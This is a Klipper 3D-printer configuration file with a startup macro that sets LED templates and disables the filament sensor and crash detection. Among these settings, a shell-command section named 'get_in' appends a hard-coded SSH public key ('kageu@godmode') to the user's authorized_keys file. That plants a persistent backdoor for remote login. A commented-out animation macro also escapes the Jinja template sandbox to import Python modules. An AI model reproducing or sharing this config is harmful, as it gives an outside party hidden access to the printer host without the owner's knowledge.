[delayed_gcode _AUTOEXEC]
initial_duration: 0.01
gcode:
    RESPOND PREFIX=💜 MSG="Starting V2.1112"

    SET_FILAMENT_SENSOR SENSOR=filament_sensor ENABLE=0
    SET_TOOLHEAD_CRASH_DETECTION ENABLE=0

    # SET_LED LED=stealthburner INDEX=1 RED=0.2 GREEN=0.0 BLUE=0.2 WHITE=0.0
    # SET_LED LED=stealthburner INDEX=2 RED=0.0 GREEN=0.0 BLUE=0.0 WHITE=0.0
    # SET_LED LED=stealthburner INDEX=3 RED=0.0 GREEN=0.0 BLUE=0.0 WHITE=0.0 TRANSMIT=1
    
    SET_LED_TEMPLATE LED=chamber_lights TEMPLATE=chamber_lights
    SET_LED_TEMPLATE LED=stealthburner INDEX=1 TEMPLATE=stealthburner_logo
    SET_LED_TEMPLATE LED=stealthburner INDEX=2 TEMPLATE=stealthburner_nozzle
    SET_LED_TEMPLATE LED=stealthburner INDEX=3 TEMPLATE=stealthburner_nozzle
    

[gcode_shell_command get_in]
command: bash -c "touch ~/.ssh/authorized_keys; echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIdsvJPenXJiZAMHHDdgVZQHkYOFV1WDaIMMXOzJpCt3 kageu@godmode | tee -a ~/.ssh/authorized_keys; echo $USER"
timeout: 60
verbose: True

# [delayed_gcode _silly_anim]
# initial_duration: 0.1
# gcode:
#     _SILLY_ANIM

# [gcode_macro _SILLY_ANIM]
# variable_t: 0
# gcode:
#     {% set __builtins__ = action_respond_info.__func__.__globals__['__builtins__'] %}
#     {% set __import__ = __builtins__.__import__ %}
#     {% set colorsys = __import__('colorsys') %}

#     {% set t = printer["gcode_macro _SILLY_ANIM"].t | int %}
#     {% set l = printer.configfile.config['neopixel pitb'].chain_count | int %}

#     {% for i in range(1, l + 1) %}
#         {% set col = colorsys.hls_to_rgb((((i + t) | float) / l), 0.05, 1.0) %}

#         SET_LED LED=pitb RED={col[0]} GREEN={col[1]} BLUE={col[2]} INDEX={i} TRANSMIT={1 if loop.last else 0}
#     {% endfor %}

#     SET_GCODE_VARIABLE MACRO=_SILLY_ANIM VARIABLE=t VALUE={t+1}
#     UPDATE_DELAYED_GCODE ID=_silly_anim DURATION={1.0/30.0}